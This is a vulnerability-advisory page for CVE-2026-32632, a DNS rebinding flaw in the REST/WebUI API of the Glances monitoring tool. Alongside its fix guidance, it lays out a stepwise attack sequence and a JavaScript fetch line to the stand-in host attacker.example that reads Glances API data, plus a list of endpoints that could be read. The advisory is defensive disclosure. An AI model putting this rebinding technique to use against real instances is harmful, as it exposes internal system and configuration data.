Skip to main content

Python CVE-2026-32632

MEDIUM
Origin Validation Error (CWE-346)
2026-03-16 https://github.com/nicolargo/glances GHSA-hhcg-r27j-fhv9
5.9
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.9 MEDIUM
AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N
SUSE
MEDIUM
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
Low
Availability
None

Lifecycle Timeline

3
Analysis Generated
Mar 16, 2026 - 17:20 vuln.today
Patch released
Mar 16, 2026 - 17:20 nvd
Patch available
CVE Published
Mar 16, 2026 - 16:34 nvd
MEDIUM 5.9

DescriptionGitHub Advisory

Summary

Glances recently added DNS rebinding protection for the MCP endpoint, but the main REST/WebUI FastAPI application still accepts arbitrary Host headers and does not apply TrustedHostMiddleware or an equivalent host allowlist.

As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin.

This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target.

Details

The MCP endpoint now has explicit host-based transport security:

python
# glances/outputs/glances_mcp.py
self.mcp_allowed_hosts = ["localhost", "127.0.0.1"]
...
return TransportSecuritySettings(
    allowed_hosts=allowed_hosts,
    allowed_origins=allowed_origins,
)

However, the main FastAPI application for REST/WebUI/token routes is initialized without any host validation middleware:

python
# glances/outputs/glances_restful_api.py
self._app = FastAPI(default_response_class=GlancesJSONResponse)
...
self._app.add_middleware(
    CORSMiddleware,
    allow_origins=config.get_list_value('outputs', 'cors_origins', default=["*"]),
    allow_credentials=config.get_bool_value('outputs', 'cors_credentials', default=True),
    allow_methods=config.get_list_value('outputs', 'cors_methods', default=["*"]),
    allow_headers=config.get_list_value('outputs', 'cors_headers', default=["*"]),
)
...
if self.args.password and self._jwt_handler is not None:
    self._app.include_router(self._token_router())
self._app.include_router(self._router())

There is no TrustedHostMiddleware, no comparison against the configured bind host, and no allowlist enforcement for HTTP Host values on the REST/WebUI surface.

The default bind configuration also exposes the service on all interfaces:

python
# glances/main.py
parser.add_argument(
    '-B',
    '--bind',
    default='0.0.0.0',
    dest='bind_address',
    help='bind server to the given IPv4/IPv6 address or hostname',
)

This combination means the HTTP service will typically be reachable from the victim machine under an attacker-selected hostname once DNS is rebound to the Glances listener.

The token endpoint is also mounted on the same unprotected FastAPI app:

python
# glances/outputs/glances_restful_api.py
def _token_router(self) -> APIRouter:
    ...
    router.add_api_route(f'{base_path}/token', self._api_token, methods=['POST'], dependencies=[])

Why This Is Exploitable

In a DNS rebinding attack:

  1. The attacker serves JavaScript from https://attacker.example.
  2. The victim visits that page while a Glances instance is reachable on the victim network.
  3. The attacker's DNS for attacker.example is rebound from the attacker's server to the Glances IP address.
  4. The victim browser now sends same-origin requests to https://attacker.example, but those requests are delivered to Glances.
  5. Because the Glances REST/WebUI app does not validate the Host header or enforce an allowed-host policy, it serves the response.
  6. The attacker-controlled JavaScript can read the response as same-origin content.

The MCP code already acknowledges this threat model and implements host-level defenses. The REST/WebUI code path does not.

Proof of Concept

This issue is code-validated by inspection of the current implementation:

  • REST/WebUI/token are all mounted on a plain FastAPI(...) app
  • no TrustedHostMiddleware or equivalent host validation is applied
  • default bind is 0.0.0.0
  • MCP has separate rebinding protection, showing the project already recognizes the threat model

In a live deployment, the expected verification is:

bash
# Victim-accessible Glances service
glances -w
# Attacker-controlled rebinding domain first resolves to attacker infra,
# then rebinds to the victim-local Glances IP.
# After rebind, attacker JS can fetch:
fetch("http://attacker.example:61208/api/4/status")
  .then(r => r.text())
  .then(console.log)

And if the operator exposes Glances without --password (supported and common), the attacker can read endpoints such as:

bash
GET /api/4/status
GET /api/4/all
GET /api/4/config
GET /api/4/args
GET /api/4/serverslist

Even on password-enabled deployments, the missing host validation still leaves the REST/WebUI/token surface reachable through rebinding and increases the value of chains with other authenticated browser issues.

Impact

  • Remote read of local/internal REST data: DNS rebinding can expose Glances instances that were intended to be reachable only from a local or internal network context.
  • Bypass of origin-based browser isolation: Same-origin policy no longer protects the API once the browser accepts the attacker-controlled rebinding host as the origin.
  • High-value chaining surface: This expands the exploitability of previously identified Glances issues involving permissive CORS, credential-bearing API responses, and state-changing authenticated endpoints.
  • Token surface exposure: The JWT token route is mounted on the same host-unvalidated app and is therefore also reachable through the rebinding path.

Recommended Fix

Apply host allowlist enforcement to the main REST/WebUI FastAPI app, similar in spirit to the MCP hardening:

python
from starlette.middleware.trustedhost import TrustedHostMiddleware

allowed_hosts = config.get_list_value(
    'outputs',
    'allowed_hosts',
    default=['localhost', '127.0.0.1'],
)

self._app.add_middleware(TrustedHostMiddleware, allowed_hosts=allowed_hosts)

At minimum:

  • reject requests whose Host header does not match an explicit allowlist
  • do not rely on 0.0.0.0 bind semantics as an access-control boundary
  • document that reverse-proxy deployments must set a strict host allowlist

References

  • glances/outputs/glances_mcp.py
  • glances/outputs/glances_restful_api.py
  • glances/main.py

AnalysisAI

The Glances system monitoring application accepts arbitrary HTTP Host headers on its REST API and WebUI endpoints, enabling DNS rebinding attacks that bypass browser same-origin policy and expose sensitive system data. While the MCP endpoint was recently hardened with host validation, the main FastAPI application for REST/WebUI/token routes lacks equivalent TrustedHostMiddleware protection, allowing attackers to rebind attacker-controlled domains to the victim's local Glances instance and read API responses as same-origin content. A proof-of-concept is code-validated through source inspection, and a patch is available in version 4.5.2 and later.

Technical ContextAI

This vulnerability exploits the interaction between DNS rebinding and host header validation in web services. Glances (pkg:pip/glances) is a system monitoring tool that exposes a FastAPI-based REST API and WebUI on configurable network interfaces, with default binding to 0.0.0.0. The root cause is CWE-346 (Origin Validation Error), where the application does not enforce TrustedHostMiddleware or an equivalent allowlist mechanism on the main REST/WebUI FastAPI application, unlike the MCP endpoint which already implements host-based transport security. FastAPI and Starlette provide TrustedHostMiddleware specifically for this purpose, but the vulnerable code paths in glances/outputs/glances_restful_api.py initialize the main _app without any host validation, creating a discrepancy with the already-hardened MCP code in glances/outputs/glances_mcp.py. The default bind configuration in glances/main.py (0.0.0.0) further exposes the service on all interfaces, making it reachable from victim machines once DNS rebinding occurs.

RemediationAI

Upgrade Glances to version 4.5.2 or later immediately (see https://github.com/nicolargo/glances/releases/tag/v4.5.2). The vendor patch applies TrustedHostMiddleware to the main FastAPI application with an explicit allowlist defaulting to localhost and 127.0.0.1, consistent with the MCP hardening approach. For deployments that cannot upgrade immediately, implement host validation at the reverse proxy or firewall layer: restrict access to Glances to trusted networks only, enforce a reverse proxy with strict Host header validation and HTTPS-only connections with HSTS headers, and configure Glances to bind only to 127.0.0.1 or specific internal IPs rather than 0.0.0.0. Document that reverse-proxy deployments must set an explicit allowed_hosts allowlist in the Glances configuration to prevent rebinding attacks through proxy Host header spoofing. Enable the --password authentication option to require credentials even on local access, reducing the attack surface for unauthenticated endpoints.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Vendor StatusVendor

SUSE

Severity: Medium
Product Status
openSUSE Tumbleweed Fixed

Share

CVE-2026-32632 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy